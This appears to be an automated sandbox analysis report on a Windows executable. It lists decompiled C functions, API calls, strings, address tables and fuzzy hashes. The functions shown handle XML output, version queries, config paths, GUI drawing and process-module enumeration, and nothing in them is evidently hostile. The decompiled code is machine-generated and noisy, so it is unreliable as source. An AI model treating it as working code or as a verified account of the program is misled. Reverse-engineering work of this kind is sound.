Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88

Uniqueness

Uniqueness Score: -1.00%

Function 004093B3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t27 = __ecx;
				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00408857(_t16, _t27);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E004086F5(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t29, _t29, _a4,  &_v1028);
			}

0x004093b3
0x004093cf
0x004093d1
0x004093d8
0x004093e6
0x004093ed
0x004093f8
0x004093fa
0x00409403
0x004093fc
0x004093fc
0x004093fc
0x0040940b
0x00409414
0x00409418
0x0040941e
0x00409425
0x00409426
0x00409431
0x00409436
0x00409437
0x00409454

APIs

memset.MSVCRT ref: 004093D8
memset.MSVCRT ref: 004093ED
_snwprintf.MSVCRT ref: 00409437

Strings

<%s>, xrefs: 00409426
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
<?xml version="1.0" ?>, xrefs: 004093FC

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDA7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E004055FF(0xff,  &_v1036, _v8);
				E004056C9(_t34, __esi);
				return 1;
			}

0x0040ddbc
0x0040ddcb
0x0040dddc
0x0040ddeb
0x0040de0c
0x00000000
0x0040de30
0x0040de17
0x0040de1d
0x0040de25
0x00000000

APIs

wcscpy.MSVCRT ref: 0040DDBC
wcscat.MSVCRT ref: 0040DDCB
wcscat.MSVCRT ref: 0040DDDC
wcscat.MSVCRT ref: 0040DDEB
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05

Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C

Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5

Strings

\StringFileInfo\, xrefs: 0040DDB6

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00406CEB
wcscpy.MSVCRT ref: 00406D0E

Strings

menu_%d, xrefs: 00406CCF
dialog_%d, xrefs: 00406CDF
strings, xrefs: 00406CF9
general, xrefs: 00406D04

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBD8, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x0040cbdb
0x0040cbe3
0x0040cbeb
0x0040cbed
0x0040cbf8
0x0040cd1b
0x0040cd1b
0x0040cd21
0x0040cd27
0x0040cd2d
0x0040cd33
0x0040cd36
0x0040cd3a
0x0040cd4e
0x0040cd56
0x0040cd5d
0x0040cddf
0x0040cddf
0x0040cde1
0x00000000
0x00000000
0x0040cd70
0x0040cd7c
0x0040cd8d
0x0040cd91
0x0040cd9d
0x0040cdab
0x0040cdae
0x0040cdbd
0x0040cdc4
0x0040cdc9
0x0040cdcb
0x0040cdd9
0x00000000
0x0040cdd9
0x00000000
0x0040cdcb
0x00000000
0x0040cddf
0x0040cd3a
0x0040cbfe
0x0040cbfe
0x0040cc04
0x00000000
0x0040cc0a
0x0040cc13
0x0040cc1b
0x0040cc1f
0x0040cc29
0x0040cc2a
0x0040cc36
0x0040cc37
0x0040cc40
0x0040cc46
0x0040cc46
0x0040cc4b
0x0040cc53
0x0040cc55
0x0040cc5f
0x0040cc6d
0x0040cc75
0x0040cc85
0x0040cc8d
0x0040cc94
0x0040cc9c
0x0040ccad
0x0040ccb1
0x0040ccc2
0x0040ccc7
0x0040cccd
0x0040ccce
0x0040ccd2
0x0040ccde
0x0040cce4
0x0040ccef
0x0040ccef
0x0040cd05
0x00000000
0x00000000
0x0040cd0b
0x0040cd10
0x0040cc5d
0x0040cc5d
0x00000000
0x00000000
0x0040cd16
0x00000000
0x0040cd10
0x0040cc5f
0x0040cc55
0x0040cde3
0x0040cde7
0x0040cde7
0x0040cc1f
0x0040cc04
0x0040cdf7

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
memset.MSVCRT ref: 0040CC75
memset.MSVCRT ref: 0040CC85

Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B

memset.MSVCRT ref: 0040CD70
wcscpy.MSVCRT ref: 0040CD91
CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004036F7, Relevance: 9.1, APIs: 6, Instructions: 106
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t29;
				intOrPtr* _t54;
				struct HWND__* _t61;
				struct HWND__* _t62;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t68;

				_t58 = __edx;
				_push(__ebx);
				_t66 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
				E00405700(_t61, E00406827(0x2ef), 1);
				E00405700(_t61, E00406827(0x2f0), 2);
				SendMessageW(_t61, 0x160, 0x15e, 0);
				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
				E00405700(_t62, E00406827(0x2f9), 1);
				E00405700(_t62, E00406827(0x2fa), 2);
				E00405700(_t62, E00406827(0x2fb), 3);
				E00405700(_t62, E00406827(0x2fc), 4);
				E00405700(_t62, E00406827(0x2fd), 5);
				SendMessageW(_t62, 0x160, 0x15e, 0);
				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
				_t63 = _t29;
				SendMessageW(_t29, 0x160, 0x15e, 0);
				E00405700(_t29, E00406827(0x30d), 1);
				E00405700(_t63, E00406827(0x30e), 2);
				_t54 = _t66;
				_pop(_t67);
				_t68 = _t54;
				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
				 *((intOrPtr*)( *_t68 + 0x1c))();
				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
				return 0;
			}

0x004036f7
0x004036f7
0x004036fa
0x00403703
0x0040371f
0x00403728
0x0040373a
0x0040374f
0x00403766
0x0040376f
0x00403781
0x00403797
0x004037a9
0x004037bf
0x004037da
0x004037e4
0x004037e6
0x004037f5
0x00403805
0x00403817
0x00403820
0x00403822
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00403716

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
GetDlgItem.USER32 ref: 0040375D
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
GetDlgItem.USER32 ref: 004037E4
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
String ID:
API String ID: 3030901043-0
Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D

Uniqueness

Uniqueness Score: -1.00%

Function 00401810, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401810(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x0040181f
0x00401836
0x00401840
0x00401848
0x00401849
0x0040184d
0x00401852
0x00401862
0x00401878

APIs

GetClientRect.USER32 ref: 0040181F
GetSystemMetrics.USER32 ref: 0040182D
GetSystemMetrics.USER32 ref: 00401839
BeginPaint.USER32(?,?), ref: 00401853
DrawFrameControl.USER32 ref: 00401862
EndPaint.USER32(?,?), ref: 0040186F

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040B659, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v518;
				signed short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t46;
				void* _t64;
				intOrPtr* _t71;
				intOrPtr _t73;

				_t67 = __ecx;
				_t73 = __ecx;
				_t71 = _a8;
				_v8 = __ecx;
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
					_v520 = _v520 & 0x00000000;
					memset( &_v518, 0, 0x1fe);
					E00401000( &_v520, _t67, 0x41203c);
					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
					_t71 = _a8;
				}
				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
					 *(_t73 + 0x210) = _t46;
				}
				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
					if( *_t71 == _t46) {
						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
					}
				}
				if(_a4 != 0x103) {
					L29:
					return _t46;
				} else {
					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
						_t46 = E0040B0C2(_t73);
						_t71 = _a8;
					}
					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
						_t64 = 0;
						if(GetKeyState(0x10) < 0) {
							_t64 = 1;
						}
						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
						_t73 = _v8;
						_t71 = _a8;
					}
					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
							_t46 = E0040824E(_t71, _t68, _t92);
						}
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
								_t46 = E004081B3(_t71, _t63, 1);
							}
							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
							 *(_t73 + 0x210) = _t46;
						}
					}
					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
						goto L29;
					} else {
						_t46 = E00402D29(_t71);
						if(_t46 == 0) {
							goto L29;
						}
						_t46 = _t73 + 0x280;
						if( *_t46 != 0) {
							goto L29;
						}
						 *_t46 = 1;
						return E00401BDC(_t73, 0x402);
					}
				}
			}

0x0040b659
0x0040b66b
0x0040b66e
0x0040b671
0x0040b674
0x0040b682
0x0040b698
0x0040b6a8
0x0040b6b6
0x0040b6bb
0x0040b6be
0x0040b6c9
0x0040b6d7
0x0040b6dc
0x0040b6e6
0x0040b6e6
0x0040b6f3
0x0040b704
0x0040b70c
0x0040b71f
0x0040b725
0x0040b725
0x0040b70c
0x0040b72f
0x0040b810
0x0040b810
0x0040b735
0x0040b739
0x0040b73d
0x0040b742
0x0040b742
0x0040b749
0x0040b74d
0x0040b758
0x0040b75a
0x0040b75a
0x0040b767
0x0040b76c
0x0040b76f
0x0040b76f
0x0040b772
0x0040b77f
0x0040b781
0x0040b788
0x0040b78c
0x0040b78c
0x0040b798
0x0040b79a
0x0040b7a6
0x0040b7ae
0x0040b7bc
0x0040b7bc
0x0040b7c1
0x0040b7cb
0x0040b7cb
0x0040b798
0x0040b7d5
0x00000000
0x0040b7d7
0x0040b7e6
0x0040b7ed
0x00000000
0x00000000
0x0040b7ef
0x0040b7f8
0x00000000
0x00000000
0x0040b7fa
0x00000000
0x0040b807
0x0040b7d5

APIs

memset.MSVCRT ref: 0040B698

Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
GetMenuStringW.USER32 ref: 0040B71F
GetKeyState.USER32(00000010), ref: 0040B74F

Strings

< A, xrefs: 0040B6A3

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID: < A
API String ID: 3550944819-1181716546
Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B147, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
				void _v526;
				long _v528;
				short _v1050;
				long _v1572;
				intOrPtr _v1576;
				char _v1580;
				void* __ebx;
				void* __edi;
				void* __esi;
				wchar_t* _t24;
				void* _t41;
				void* _t42;

				_t41 = __ecx;
				_t42 = __eax;
				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
					_v528 = 0;
					memset( &_v526, 0, 0x208);
					E00405800( &_v528);
					_t24 = wcsrchr( &_v528, 0x2e);
					if(_t24 != 0) {
						 *_t24 = 0;
					}
					wcscat( &_v528, L".cfg");
					_v1576 = _a4;
					_v1580 = 0x410838;
					_v1572 = 0;
					_v1050 = 0;
					wcscpy( &_v1572,  &_v528);
					E0040D909( &_v1580);
					_t45 =  &_v1580;
					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
					E0040196B(_t42, _t41,  &_v1580);
					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
				}
				return __eax;
			}

0x0040b147
0x0040b152
0x0040b15c
0x0040b16f
0x0040b176
0x0040b182
0x0040b190
0x0040b19a
0x0040b19c
0x0040b19c
0x0040b1ac
0x0040b1b4
0x0040b1c8
0x0040b1d2
0x0040b1d9
0x0040b1e0
0x0040b1ee
0x0040b1f9
0x0040b1ff
0x0040b206
0x00000000
0x0040b218
0x0040b21c

APIs

memset.MSVCRT ref: 0040B176

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 0040B190
wcscat.MSVCRT ref: 0040B1AC
wcscpy.MSVCRT ref: 0040B1E0

Strings

.cfg, xrefs: 0040B1A6

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcscpywcsrchr
String ID: .cfg
API String ID: 3959449883-3410578098
Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408E65, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t30;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				_t38 = __ecx;
				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
						_t38 =  *((intOrPtr*)(__edi + 0x6c));
						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
						_t44 =  &_v516;
